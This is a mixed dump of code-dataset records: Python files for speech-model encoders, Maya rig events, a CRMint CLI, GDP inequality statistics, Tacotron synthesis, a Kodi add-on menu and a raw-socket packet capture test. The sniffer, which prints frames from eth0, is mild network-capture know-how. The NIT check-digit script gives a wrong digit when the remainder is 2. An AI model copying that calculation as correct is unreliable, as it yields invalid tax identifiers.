self.c_dim, batch_first=True)\n\n\n def forward(self, x):\n # with tsensor.clarify():\n # print(\"x shape\", x.size()) # ([16, 406, 80]) \n x = x.transpose(1,2)\n out = conv_bank(x, self.conv_bank, act=self.act)\n # print(\"out shape\", out.size())\n # out = conv_bank(x, self.conv_bank)\n # dimension reduction layer\n out = pad_layer(out, self.in_conv_layer)\n out = self.norm_layer(out)\n out = self.act(out)\n out = self.dropout_layer(out)\n # convolution blocks\n for l in range(self.n_conv_blocks):\n y = pad_layer(out, self.first_conv_layers[l])\n y = self.norm_layer(y)\n y = self.act(y)\n y = self.dropout_layer(y)\n y = pad_layer(y, self.second_conv_layers[l])\n y = self.norm_layer(y)\n y = self.act(y)\n y = self.dropout_layer(y)\n if self.subsample[l] > 1:\n out = F.avg_pool1d(out, kernel_size=self.subsample[l], ceil_mode=True)\n out = y + out\n # The preceding blocks downsample the time axis (1/2 per subsampled block): the original input feature is ([16, 128, 406]) (batch, feature, frame) and the resulting out is ([16, 128, 51]) \n z_beforeVQ = out.transpose(1,2)\n z, r, loss, perplexity = self.codebook(z_beforeVQ) \n # print(\"out shape\",out.size()) # batch, feature, frame ([16, 128, 51])\n # print(\"z_beforeVQ shape\", z_beforeVQ.size()) # batch, frame, feature ([16, 51, 128]) \n # print(\"z_afterVQ shape\", z.size()) # ([16, 51, 128]) \n # print(\"r shape\", r.size()) # ([16, 51, 128]) \n # print(\"loss\", loss)\n # print(\"perplexity\", perplexity) \n c, _ = self.rnn(z) # (16, 51, 128) -> (16, 51, 256) \n # print(\"c shape\", c.size()) #([16, 51, 256]) \n #input.size(-1) must be equal to input_size. Expected 64, got 51 \n return z, c, z_beforeVQ, loss, perplexity\n # mu = pad_layer(out, self.mean_layer)\n # log_sigma = pad_layer(out, self.std_layer)\n # return out, mu, log_sigma\n\n # def inference(self, x):\n # print(\"x shape\", x.size())\n # x = x.transpose(1,2) \n # out = conv_bank(x, self.conv_bank, act=self.act)\n # # dimension reduction layer\n # out = pad_layer(out, self.in_conv_layer)\n # out = self.norm_layer(out)\n # out = self.act(out)\n # out = self.dropout_layer(out)\n # # convolution blocks\n # for l in range(self.n_conv_blocks):\n # y = pad_layer(out, self.first_conv_layers[l])\n # y = self.norm_layer(y)\n # y = self.act(y)\n # y = self.dropout_layer(y)\n # y = pad_layer(y, self.second_conv_layers[l])\n # y = self.norm_layer(y)\n # y = self.act(y)\n # y = self.dropout_layer(y)\n # if self.subsample[l] > 1:\n # out = F.avg_pool1d(out, kernel_size=self.subsample[l], ceil_mode=True)\n # out = y + out\n # z_beforeVQ = out.transpose(1,2)\n # z, r, indices = self.codebook.inference(z_beforeVQ) # z: (bz, 128/2, 64)\n # c, _ = self.rnn(z) # (64, 140/2, 64) -> (64, 140/2, 256)\n # return z, c, z_beforeVQ, indices\n\n\n\n\n# adin vc speaker encoder\nclass StyleEncoder(nn.Module):\n def __init__(self, preprocess_config, model_config):\n super(StyleEncoder, self).__init__()\n self.c_in = model_config[\"style_encoder\"][\"c_in\"]\n self.c_h = model_config[\"style_encoder\"][\"c_h\"]\n self.c_out= model_config[\"style_encoder\"][\"c_out\"] \n self.kernel_size= model_config[\"style_encoder\"][\"kernel_size\"] \n self.n_conv_blocks = model_config[\"style_encoder\"][\"n_conv_blocks\"] \n self.n_dense_blocks = model_config[\"style_encoder\"][\"n_dense_blocks\"] \n self.subsample= model_config[\"style_encoder\"][\"subsample\"] \n self.act = get_act(model_config[\"style_encoder\"][\"act\"]) #'relu'\n self.bank_size= model_config[\"style_encoder\"][\"bank_size\"]\n self.bank_scale= model_config[\"style_encoder\"][\"bank_scale\"]\n self.c_bank= 
model_config[\"style_encoder\"][\"c_bank\"]\n self.dropout_rate= model_config[\"style_encoder\"][\"dropout_rate\"] \n\n self.conv_bank = nn.ModuleList(\n [nn.Conv1d(self.c_in, self.c_bank, kernel_size=k) for k in range(self.bank_scale, self.bank_size + 1, self.bank_scale)])\n in_channels = self.c_bank * (self.bank_size // self.bank_scale) + self.c_in\n self.in_conv_layer = nn.Conv1d(in_channels, self.c_h, kernel_size=1)\n self.first_conv_layers = nn.ModuleList([nn.Conv1d(self.c_h, self.c_h, kernel_size=self.kernel_size) for _ \\\n in range(self.n_conv_blocks)])\n self.second_conv_layers = nn.ModuleList([nn.Conv1d(self.c_h, self.c_h, kernel_size=self.kernel_size, stride=sub) \n for sub, _ in zip(self.subsample, range(self.n_conv_blocks))])\n self.pooling_layer = nn.AdaptiveAvgPool1d(1)\n self.first_dense_layers = nn.ModuleList([nn.Linear(self.c_h, self.c_h) for _ in range(self.n_dense_blocks)])\n self.second_dense_layers = nn.ModuleList([nn.Linear(self.c_h, self.c_h) for _ in range(self.n_dense_blocks)])\n self.output_layer = nn.Linear(self.c_h, self.c_out)\n self.dropout_layer = nn.Dropout(p=self.dropout_rate)\n self.mean_layer = nn.Conv1d(self.c_h, self.c_out, kernel_size=1)\n self.std_layer = nn.Conv1d(self.c_h, self.c_out, kernel_size=1) \n\n def conv_blocks(self, inp):\n out = inp\n # convolution blocks\n for l in range(self.n_conv_blocks):\n y = pad_layer(out, self.first_conv_layers[l])\n y = self.act(y)\n y = self.dropout_layer(y)\n y = pad_layer(y, self.second_conv_layers[l])\n y = self.act(y)\n y = self.dropout_layer(y)\n if self.subsample[l] > 1:\n out = F.avg_pool1d(out, kernel_size=self.subsample[l], ceil_mode=True)\n out = y + out\n return out\n\n def dense_blocks(self, inp):\n out = inp\n # dense layers\n for l in range(self.n_dense_blocks):\n y = self.first_dense_layers[l](out)\n y = self.act(y)\n y = self.dropout_layer(y)\n y = self.second_dense_layers[l](y)\n y = self.act(y)\n y = self.dropout_layer(y)\n out = y + out\n return out\n\n def forward(self, x):\n # print(\"x shape\", x.size())\n x = x.transpose(1,2) \n out = conv_bank(x, self.conv_bank, act=self.act)\n # out = conv_bank(x, self.conv_bank)\n # dimension reduction layer\n out = pad_layer(out, self.in_conv_layer)\n out = self.act(out)\n # conv blocks\n out = self.conv_blocks(out)\n # avg pooling\n out = self.pooling_layer(out).squeeze(2)\n # print(\"after pooling layer shape\", out.shape) # ([16, 128]) \n # dense blocks\n out = self.dense_blocks(out)\n out = self.output_layer(out)\n # print(\"style encoder final style embedding shape\", out.shape) # ([16, 128]) \n out_for_mean_var = out.unsqueeze(1).transpose(1,2)\n # print(\"out_for_mean_var shape\", out_for_mean_var.size()) #([16, 128, 1]) \n mu = pad_layer(out_for_mean_var, self.mean_layer).squeeze() # ([16, 128, 1]) -> ([16, 1, 128]) \n log_sigma = pad_layer(out_for_mean_var, self.std_layer).squeeze() \n # print(\"mu shape\", mu.size()) ([16, 128]) \n # print(\"log_sigma shape\", log_sigma.size()) ([16, 128]) \n return out, mu, log_sigma \n # return out\n\n\n\nclass SpectrogramEncoder(nn.Module):\n def __init__(self, preprocess_config, model_config):\n super(SpectrogramEncoder, self).__init__()\n self.dim_neck = model_config[\"SpectrogramEncoder\"][\"dim_neck\"]\n self.c_in = model_config[\"SpectrogramEncoder\"][\"c_in\"]\n convolutions = []\n for i in range(3):\n conv_layer = nn.Sequential(\n ConvNorm(self.c_in,\n 512,\n kernel_size=5, stride=1,\n padding=2,\n dilation=1, w_init_gain='relu'),\n nn.BatchNorm1d(512))\n convolutions.append(conv_layer)\n 
self.convolutions = nn.ModuleList(convolutions)\n \n self.lstm = nn.LSTM(512, self.dim_neck, 2, batch_first=True, bidirectional=True)\n\n def forward(self, x):\n x = x.squeeze(1).transpose(2,1)\n # print(\"after squeeze and transpose shape\", x.size()) ([16, 512, 128]) \n # c_org = c_org.unsqueeze(-1).expand(-1, -1, x.size(-1))\n # x = torch.cat((x, c_org), dim=1)\n \n for conv in self.convolutions:\n x = F.relu(conv(x))\n x = x.transpose(1, 2)\n \n self.lstm.flatten_parameters()\n outputs, _ = self.lstm(x)\n # print(\"outputs shape\", outputs.size())\n # out_forward = outputs[:, :, :self.dim_neck]\n # out_backward = outputs[:, :, self.dim_neck:]\n # codes = []\n # for i in range(0, outputs.size(1), self.freq):\n # codes.append(torch.cat((out_forward[:,i+self.freq-1,:],out_backward[:,i,:]), dim=-1))\n return outputs\n \n\n","sub_path":"model/encoders.py","file_name":"encoders.py","file_ext":"py","file_size_in_byte":15746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"314967612","text":"#!/usr/bin/python3\n\nimport socket\n\ndef main():\n s = socket.socket(\n socket.AF_PACKET,\n socket.SOCK_RAW,\n socket.htons(3)\n )\n frameCount=0\n\n s.bind(('eth0', 3))\n\n while True:\n message = s.recv(256)\n\n print(\"This is packet number :\", frameCount)\n print(message)\n\n frameCount+=1\n if frameCount > 1000:\n exit()\n\nif __name__ == '__main__':\n main()\n","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"150232195","text":"\nimport logging\nfrom functools import partial\nimport maya.cmds as cmds\nimport maya.OpenMaya as api\nimport pymel.core as pm\nimport pymetanode as meta\n\nfrom .blueprints import Blueprint\nfrom .rigs import isRig\n\n__all__ = [\n 'Event',\n 'MayaCallbackEvents',\n 'RigEventsMixin',\n 'RigLifecycleEvents',\n]\n\nLOG = logging.getLogger(__name__)\n\n\nclass Event(list):\n \"\"\"\n A list of callable objects. 
Calling an Event\n will cause a call to each item in the list in order.\n \"\"\"\n\n def __call__(self, *args, **kwargs):\n for func in self:\n func(*args, **kwargs)\n\n def __repr__(self):\n return \"Event(%s)\" % list.__repr__(self)\n\n def appendUnique(self, item):\n if item not in self:\n self.append(item)\n\n def removeAll(self, item):\n while item in self:\n self.remove(item)\n\n\nclass MayaCallbackEvents(object):\n \"\"\"\n Base for any event dispatcher that will make use\n of Maya api MMessage callbacks.\n\n Provides functionality for easy callback management\n to make sure callbacks are not redundantly registered\n and are properly removed.\n \"\"\"\n\n def __init__(self):\n # have maya callbacks been registered?\n self._areMayaCallbacksRegistered = False\n # list of maya callback IDs that have been registered\n self._callbackIDs = []\n # list of objects that are subscribed to any events\n # used to determine if maya callbacks should be registered\n self._subscribers = []\n\n def __del__(self):\n self._unregisterMayaCallbacks()\n\n def _registerMayaCallbacks(self):\n \"\"\"\n Register all Maya callbacks for this dispatcher.\n Does nothing if callbacks are already registered.\n \"\"\"\n if not self._areMayaCallbacksRegistered:\n self._areMayaCallbacksRegistered = True\n self._callbackIDs = list(self._addMayaCallbacks())\n LOG.debug('{0}._registerMayaCallbacks'.format(\n self.__class__.__name__))\n\n def _addMayaCallbacks(self):\n \"\"\"\n Should be overridden in subclasses to register any Maya\n message callbacks. This will only be called if callbacks\n are not already registered.\n\n Returns:\n A list of callback IDs for all newly added callbacks.\n \"\"\"\n return []\n\n def _unregisterMayaCallbacks(self):\n \"\"\"\n Unregister all Maya callbacks, if currently registered.\n \"\"\"\n if self._areMayaCallbacksRegistered:\n self._areMayaCallbacksRegistered = False\n for cbId in self._callbackIDs:\n api.MMessage.removeCallback(cbId)\n self._callbackIDs = []\n LOG.debug('{0}._unregisterMayaCallbacks'.format(\n self.__class__.__name__))\n\n def addSubscriber(self, subscriber):\n \"\"\"\n Add a subscriber to this event dispatcher\n \"\"\"\n if subscriber not in self._subscribers:\n self._subscribers.append(subscriber)\n if self._subscribers:\n self._registerMayaCallbacks()\n\n def removeSubscriber(self, subscriber):\n \"\"\"\n Remove a subscriber from this event dispatcher\n \"\"\"\n if subscriber in self._subscribers:\n self._subscribers.remove(subscriber)\n if not self._subscribers:\n self._unregisterMayaCallbacks()\n\n\nclass RigLifecycleEvents(MayaCallbackEvents):\n \"\"\"\n A singular object responsible for dispatching\n Rig creation and deletion events.\n\n Events:\n onRigCreated(node):\n Called when any rig is created. Passes\n the newly created rig node.\n onRigDeleted(node):\n Called when any rig is deleted. 
Passes\n the rig node that is being deleted.\n \"\"\"\n\n # the shared events instance\n INSTANCE = None\n\n @classmethod\n def getShared(cls):\n if not cls.INSTANCE:\n cls.INSTANCE = cls()\n return cls.INSTANCE\n\n def __init__(self):\n super(RigLifecycleEvents, self).__init__()\n self.onRigCreated = Event()\n self.onRigDeleted = Event()\n\n # override\n def _addMayaCallbacks(self):\n # rig nodes are always of type 'transform'\n addId = api.MDGMessage.addNodeAddedCallback(\n self._onNodeAdded, 'transform')\n removeId = api.MDGMessage.addNodeRemovedCallback(\n self._onNodeRemoved, 'transform')\n return (addId, removeId)\n\n def _onNodeAdded(self, node, *args):\n \"\"\"\n Args:\n node: A MObject node that was just added\n \"\"\"\n # no way to know if it's a Rig yet,\n # defer until later and check the node again\n # TODO: do this more precisely, don't use deferred\n\n mfn = api.MFnDependencyNode(node)\n if mfn.typeName() != 'transform':\n # rig nodes must be transforms\n return\n\n fullName = api.MFnDagNode(node).fullPathName()\n cmds.evalDeferred(\n partial(self._onNodeAddedDeferred, fullName), evaluateNext=True)\n\n def _onNodeAddedDeferred(self, fullName, *args):\n \"\"\"\n Args:\n fullName: A string full name of a node that was added\n \"\"\"\n node = meta.getMObject(fullName)\n if node:\n if isRig(node):\n LOG.debug(\"onRigCreated('{0}')\".format(node))\n self.onRigCreated(pm.PyNode(node))\n\n def _onNodeRemoved(self, node, *args):\n \"\"\"\n Args:\n node: A MObject node that is being removed\n \"\"\"\n if isRig(node):\n LOG.debug(\"onRigDeleted('{0}')\".format(node))\n self.onRigDeleted(pm.PyNode(node))\n\n\nclass RigEventsMixin(object):\n \"\"\"\n A mixin for listening to shared events related\n to Rig events, such as creation and deletion\n \"\"\"\n\n def enableRigEvents(self):\n \"\"\"\n Enable Rig lifecycle events on this object.\n \"\"\"\n lifeEvents = RigLifecycleEvents.getShared()\n lifeEvents.onRigCreated.appendUnique(self.onRigCreated)\n lifeEvents.onRigDeleted.appendUnique(self.onRigDeleted)\n lifeEvents.addSubscriber(self)\n\n def disableRigEvents(self):\n \"\"\"\n Disable Rig events on this object\n \"\"\"\n lifeEvents = RigLifecycleEvents.getShared()\n lifeEvents.onRigCreated.removeAll(self.onRigCreated)\n lifeEvents.onRigDeleted.removeAll(self.onRigDeleted)\n lifeEvents.removeSubscriber(self)\n\n def onRigCreated(self, node):\n pass\n\n def onRigDeleted(self, node):\n pass\n","sub_path":"src/pulse/scripts/pulse/core/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":6560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"428797717","text":"# Copyright 2018 Google Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport os\nimport sys\n\nPLUGIN_FOLDER = os.path.join(os.path.dirname(__file__), 'commands')\nPROJECT_DIR = os.path.dirname(os.path.dirname(__file__))\nCLI_DIR = os.path.dirname(__file__)\nsys.path.insert(0, PROJECT_DIR)\nsys.path.insert(0, CLI_DIR)\n\nimport click\nfrom 
cli.utils import shared\nfrom backends.core import insight\n\n\ndef _set_insight_opt_out(config, value):\n config['opt_out'] = value\n with open(insight.INSIGHT_CONF_FILEPATH, 'w+') as fp:\n json.dump(config, fp)\n\n\ndef print_version(ctx, param, value):\n if not value or ctx.resilient_parsing:\n return\n click.echo(insight.get_crmint_version())\n ctx.exit()\n\n\nclass CRMintCLI(click.MultiCommand):\n \"\"\"App multi command CLI\"\"\"\n\n def _ask_permission(self):\n pkg_name = \"CRMint\"\n msg = click.style(\n \"==========================================================================\",\n fg=\"black\")\n msg += click.style(\n \"\\nWe're constantly looking for ways to make \",\n fg='yellow')\n msg += click.style(pkg_name, fg=\"red\", bold=True)\n msg += click.style(\n \" better! \\nMay we anonymously report usage statistics to improve the tool over time? \\n\"\n \"More info: https://github.com/google/crmint & https://google.github.io/crmint\",\n fg='yellow')\n msg += click.style(\n \"\\n==========================================================================\",\n fg='black')\n if click.confirm(msg, default=True):\n return True\n return False\n\n def list_commands(self, ctx):\n rv = []\n for filename in os.listdir(PLUGIN_FOLDER):\n if not filename.startswith(\"_\") and filename.endswith(\".py\"):\n rv.append(filename[:-3])\n rv.sort()\n return rv\n\n def get_command(self, ctx, name):\n ns = {}\n full_name = os.path.join(PLUGIN_FOLDER, \"%s%s\" % (name, \".py\"))\n with open(full_name) as f:\n code = compile(f.read(), full_name, 'exec')\n eval(code, ns, ns)\n return ns.get('cli', None)\n\n def resolve_command(self, ctx, args):\n self.insight = insight.GAProvider()\n if '--no-insight' in args:\n args.remove('--no-insight')\n _set_insight_opt_out(self.insight.config, True)\n if self.insight.opt_out is None:\n # None means that we still didn't record the user consent.\n self.insight.track('downloaded')\n permission_given = self._ask_permission()\n _set_insight_opt_out(self.insight.config, not permission_given)\n # Reload with the new configuration.\n self.insight = insight.GAProvider()\n self.insight.track('installed')\n self.insight.track(*args)\n return super(CRMintCLI, self).resolve_command(ctx, args)\n\n\n@click.command(cls=CRMintCLI, help='Manage your CRMint instances on GCP or locally.')\n@click.option('--version', is_flag=True, callback=print_version,\n expose_value=False, is_eager=True, help='Print out CRMint version.')\ndef cli():\n pass\n\n\ndef entry_point():\n shared.check_variables()\n cli()\n","sub_path":"cli/appcli.py","file_name":"appcli.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"66073176","text":"# -*- coding: utf-8 -*-\n\n'''\nThis code calculates changes in the ratio between different population-weighted GDP deciles and quintiles\n\nby Yixuan Zheng (yxzheng@carnegiescience.edu)\n''' \n\nimport pandas as pd\nimport numpy as np\nfrom netCDF4 import Dataset\nimport _env\n \ndatasets = _env.datasets \nscenarios = _env.scenarios\n \ngdp_year = 2010\nsgdp_year = str(gdp_year)\nidir_temp = _env.odir_root + '/sim_temperature/' \n\n####summarize global and regional GDP changes####\ngdp_year = 2010\nsgdp_year = str(gdp_year)\nboot_methods = ['country-lag0','country-lag1','country-lag5','year','year-blocks']\nitbl_gdp_baseline = pd.read_csv(_env.odir_root + 'basic_stats' + '/Country_Basic_Stats.csv')\n\nitbl_gdp_baseline.sort_values([sgdp_year + 
'_gdpcap'],inplace=True)\ntot_pop = itbl_gdp_baseline[sgdp_year + '_pop'].sum()\n#itbl_gdp_baseline['2010_pop_ratio'] = itbl_gdp_baseline['2010_pop']/tot_pop\n\nitbl_gdp_baseline[sgdp_year + '_gdpsum'] = 0\n#itbl_gdp_baseline['2010_popw_gdp'] = 0\nitbl_gdp_baseline[sgdp_year + '_popsum'] = 0\n#itbl_gdp_baseline['2010_pop_ratio_sum'] = 0\n\nfor irow, row in enumerate(itbl_gdp_baseline.index):\n if irow == 0:\n itbl_gdp_baseline.loc[row,sgdp_year + '_gdpsum'] = itbl_gdp_baseline.loc[row,sgdp_year + '_gdp']\n itbl_gdp_baseline.loc[row, sgdp_year + '_popsum'] = itbl_gdp_baseline.loc[row,sgdp_year + '_pop']\n \n else:\n itbl_gdp_baseline.loc[row,sgdp_year + '_gdpsum'] = itbl_gdp_baseline[sgdp_year + '_gdpsum'].iloc[irow-1] + itbl_gdp_baseline.loc[row,sgdp_year + '_gdp']\n itbl_gdp_baseline.loc[row, sgdp_year + '_popsum'] = itbl_gdp_baseline[sgdp_year + '_popsum'].iloc[irow-1] + itbl_gdp_baseline.loc[row,sgdp_year + '_pop'] \n \nitbl_gdp_baseline[sgdp_year + '_pop_ratio_sum'] = itbl_gdp_baseline[sgdp_year + '_popsum']/tot_pop\n\n#deciles (<=10% and >=90%)\n\ndeciles = {}\n\nind10 = np.where(itbl_gdp_baseline[sgdp_year + '_pop_ratio_sum']<=0.1)[0]\ndeciles[10] = itbl_gdp_baseline.iloc[ind10].copy()\n\n\nind90 = np.where(itbl_gdp_baseline[sgdp_year + '_pop_ratio_sum']>=0.9)[0]\ndeciles[90] = itbl_gdp_baseline.iloc[ind90].copy()\n\n\n#quintiles (<=20% and >=80%)\n\nind20 = np.where(itbl_gdp_baseline[sgdp_year + '_pop_ratio_sum']<=0.2)[0]\ndeciles[20] = itbl_gdp_baseline.iloc[ind20].copy()\n\nind80 = np.where(itbl_gdp_baseline[sgdp_year + '_pop_ratio_sum']>=0.8)[0]\ndeciles[80] = itbl_gdp_baseline.iloc[ind80].copy()\n\n\nfor ds in datasets:\n \n scens = ['No-Aerosol']\n if ds == 'ERA-Interim':\n scens = ['No-Aerosol','No-Sulfate']\n \n idir_gdp = _env.odir_root + '/gdp_' + ds + '/' \n odir_summary = _env.odir_root + '/summary_' + ds + '/' \n _env.mkdirs(odir_summary)\n \n for scen in scens: \n writer = pd.ExcelWriter(odir_summary + 'Deciles_and_Quintile_ratio_changes_'+ds+'_'+scen+'_Burke.xls')\n otbls_ctry_GDP_stat = {}\n \n otbls = {}\n otbl_ineq = pd.DataFrame(index = boot_methods,columns = ['median_ratio','5_ratio','95_ratio','10_ratio','90_ratio','probability_reduced'])\n \n otbls['deciles'] = otbl_ineq.copy()\n otbls['quintiles'] = otbl_ineq.copy()\n \n for b_m in boot_methods:\n \n inc_gdp = Dataset(idir_gdp + 'GDP_Changes_Burke_' + b_m + '_' + str(gdp_year) + '_'+ds+'_'+scen+'.nc')\n imtrx_gdp = inc_gdp['GDP'][:]\n \n dec_var = {}\n dec_base = {}\n \n for perc in [10,20,80,90]:\n dec = deciles[perc].copy()\n dec_pop_tot = dec[sgdp_year + '_pop'].sum()\n dec_gdp_tot = dec[sgdp_year + '_gdp'].sum()\n \n dec_base[perc] = dec_gdp_tot/dec_pop_tot\n ind_ctry = dec.index\n \n imtrx_dec = imtrx_gdp[:,ind_ctry,:]\n imtrx_dec_sum = dec_gdp_tot-(imtrx_dec.data).sum(axis=1) \n# print(perc, np.median(imtrx_dec_sum),dec_gdp_tot,np.median(imtrx_dec_sum)/dec_gdp_tot)\n \n dec_gdpcap = imtrx_dec_sum/dec_pop_tot\n dec_var[perc] = dec_gdpcap.copy()\n \n dec_diff = (dec_var[90]/dec_var[10]-dec_base[90]/dec_base[10])/(dec_base[90]/dec_base[10])*100\n quin_diff = (dec_var[80]/dec_var[20] - dec_base[80]/dec_base[20])/(dec_base[80]/dec_base[20])*100\n \n \n \n otbls['deciles'].loc[b_m,'median_ratio'] = np.median(dec_diff)\n otbls['deciles'].loc[b_m,'5_ratio'] = np.percentile(dec_diff,5)\n otbls['deciles'].loc[b_m,'95_ratio'] = np.percentile(dec_diff,95)\n \n otbls['deciles'].loc[b_m,'10_ratio'] = np.percentile(dec_diff,10)\n otbls['deciles'].loc[b_m,'90_ratio'] = np.percentile(dec_diff,90)\n 
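# Aside: a quick sanity check of the percent-change formula applied to these
# decile/quintile ratios, with hypothetical numbers (not taken from the data):
#     base = 40000 / 2000            -> 20.0    baseline 90th/10th ratio
#     cf   = 38000 / 2100            -> ~18.10  counterfactual ratio
#     (cf - base) / base * 100       -> ~-9.5   (negative => gap narrowed)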
otbls['deciles'].loc[b_m,'probability_reduced'] = len(dec_diff[dec_diff<0])/np.size(dec_diff)\n \n otbls['quintiles'].loc[b_m,'median_ratio'] = np.median(quin_diff)\n otbls['quintiles'].loc[b_m,'5_ratio'] = np.percentile(quin_diff,5)\n otbls['quintiles'].loc[b_m,'95_ratio'] = np.percentile(quin_diff,95)\n \n otbls['quintiles'].loc[b_m,'10_ratio'] = np.percentile(quin_diff,10)\n otbls['quintiles'].loc[b_m,'90_ratio'] = np.percentile(quin_diff,90)\n otbls['quintiles'].loc[b_m,'probability_reduced'] = len(quin_diff[quin_diff<0])/np.size(quin_diff)\n \n otbls['deciles'].to_excel(writer,'deciles')\n otbls['quintiles'].to_excel(writer,'quintiles')\n \n writer.save()\n\n\n\n \n\n","sub_path":"modules/7.Cal_changes_in_inequality.py","file_name":"7.Cal_changes_in_inequality.py","file_ext":"py","file_size_in_byte":5560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"443841751","text":"#solo calcula dv nit de 9 digitos\n\nnit=input(\"Ingrese nit: \")\n\nmtr1=int(nit[0])*41\nmtr2=int(nit[1])*37\nmtr3=int(nit[2])*29\nmtr4=int(nit[3])*23\nmtr5=int(nit[4])*19\nmtr6=int(nit[5])*17\nmtr7=int(nit[6])*13\nmtr8=int(nit[7])*7\nmtr9=int(nit[8])*3\n\nsuma=mtr1+mtr2+mtr3+mtr4+mtr5+mtr6+mtr7+mtr8+mtr9\n\nmodulo11=suma % 11\nmodulo11m=11-modulo11\nif modulo11 <= 2:\n print(nit,\"-\",modulo11)\nelse:\n print(nit,\"-\",modulo11m)\n\n\n","sub_path":"nit.py","file_name":"nit.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"108459805","text":"import os\nimport numpy as np\nimport tensorflow as tf\nfrom hparams import hparams\n# from tacotron.models import create_model\nfrom tacotron.utils.text import text_to_sequence\nfrom tacotron.utils import plot\nfrom datasets import audio\nfrom tacotron.models.tacotron import Tacotron\n\n\nclass Synthesizer:\n\tdef load(self, checkpoint_path):\n\t\tinputs = tf.placeholder(tf.int32, [1, None], 'inputs')\n\t\tinput_lengths = tf.placeholder(tf.int32, [1], 'input_lengths')\n\n\t\twith tf.variable_scope('model') as scope:\n\t\t\tself.model = Tacotron(hparams)\n\t\t\tself.model.initialize(inputs, input_lengths)\n\t\t\tself.mel_outputs = self.model.mel_outputs\n\t\t\tself.alignment = self.model.alignments[0]\n\n\t\tself.session = tf.Session()\n\t\tself.session.run(tf.global_variables_initializer())\n\t\tsaver = tf.train.Saver()\n\t\tsaver.restore(self.session, checkpoint_path)\n\n\tdef synthesize(self, text, idx, out_dir, mel_filename):\n\t\tcleaner_names = [x.strip() for x in hparams.cleaners.split(',')]\n\t\tseq = text_to_sequence(text, cleaner_names)\n\t\tfeed_dict = {\n\t\t\tself.model.inputs: [np.asarray(seq, dtype=np.int32)],\n\t\t\tself.model.input_lengths: np.asarray([len(seq)], dtype=np.int32),\n\t\t}\n\n\t\tmels, alignment = self.session.run([self.mel_outputs, self.alignment], feed_dict=feed_dict)\n\n\t\tmels = mels.reshape(-1, hparams.num_mels)\n\n\t\twav = audio.inv_mel_spectrogram(mels.T)\n\t\taudio.save_wav(wav, os.path.join(out_dir, 'audio-{:02d}.wav'.format(idx)))\n\n\t\t# save mel spectrogram plot\n\t\tplot.plot_spectrogram(mels, os.path.join(out_dir, 'mel-{:02d}.png'.format(idx)),\n\t\t\t\tinfo='{}'.format(text), split_title=True)\n\n\t\treturn 1\n","sub_path":"tacotron/synthesizer.py","file_name":"synthesizer.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"430880330","text":"import shapely.geometry\nfrom shapely.ops 
import cascaded_union, unary_union\nimport multiprocessing\nfrom geojson import Feature\n\n\n# 권역정보 로드\ndef apiSample(shapes, groupingDictionary, key):\n clusters = {}\n for shape in shapes:\n cluster_id = groupingDictionary.get(key, None)\n if cluster_id not in clusters:\n clusters[cluster_id] = []\n\n clusters[cluster_id].append(shapely.geometry.shape(shape['geometry']))\n\n\n# 권역 합치기(멀티프로세싱)\ndef multiprocessingUnionClusters(clusters):\n pool = multiprocessing.Pool(multiprocessing.cpu_count())\n unionFeatures = pool.map(unionClusterWrapper, clusters.items())\n return unionFeatures\n\n\ndef unionClusters(cluster_id, clusters):\n union_poly = unary_union(clusters)\n return Feature(\n geometry=union_poly, properties={\n \"type\": \"c\",\n \"cluster\": cluster_id,\n }\n )\n\n\ndef unionClusterWrapper(args):\n return unionClusters(*args)","sub_path":"app/util/union.py","file_name":"union.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"619585464","text":"import time\nimport xbmc\nimport os\nimport xbmcgui\nimport urllib2\n\nHOME = xbmc.translatePath('special://userdata/')\niddata = os.path.join(HOME, 'networksettings.xml')\n\ndef menuoptions():\n dialog = xbmcgui.Dialog()\n funcs = (\n function1,\n function2\n )\n \n call = dialog.select('[B][COLOR=yellow]CerebroTV[/COLOR][COLOR=red] Exit / Reboot[/COLOR][/B]', [\n '[B][COLOR=green]Run House Keeper and Reboot[/COLOR][/B]',\n '[B][COLOR=green]Exit Kodi[/COLOR][/B]'])\n # dialog.selectreturns\n # 0 -> escape pressed\n # 1 -> first item\n # 2 -> second item\n if call:\n # esc is not pressed\n if call < 0:\n return\n func = funcs[call-2]\n #dp = xbmcgui.DialogProgress()\n #dp.create(\"[COLOR tomato]CerebroTV[/COLOR]\",\"\"+str(func)+\" -3\",\"PLEASE EXIT KODI OR PULL THE POWER LEAD\")\n #xbmc.sleep(1000)\n return func()\n else:\n func = funcs[call]\n #dp = xbmcgui.DialogProgress()\n #dp.create(\"[COLOR tomato]CerebroTV[/COLOR]\",\"\"+str(func)+\" +0\",\"PLEASE EXIT KODI OR PULL THE POWER LEAD\")\n #xbmc.sleep(1000)\n return func()\n return \n\n\ndef function1():\n\n if os.path.exists(iddata):\n with open(iddata, 'r') as mymega:\n userid=mymega.read()\n try: response = urllib2.urlopen('http://megatvbox.co.uk/TV-DATA/auth2.php?id='+str(userid)+'&die=1').read()\n except: pass\n xbmc.executebuiltin('RunAddon(script.program.megatvhousekeeper3)')\n\ndef function2():\n xbmc.executebuiltin(\"Notification(CerebroTV,Closing SPMC/Kodi, Will take a few seconds,7000,)\")\n 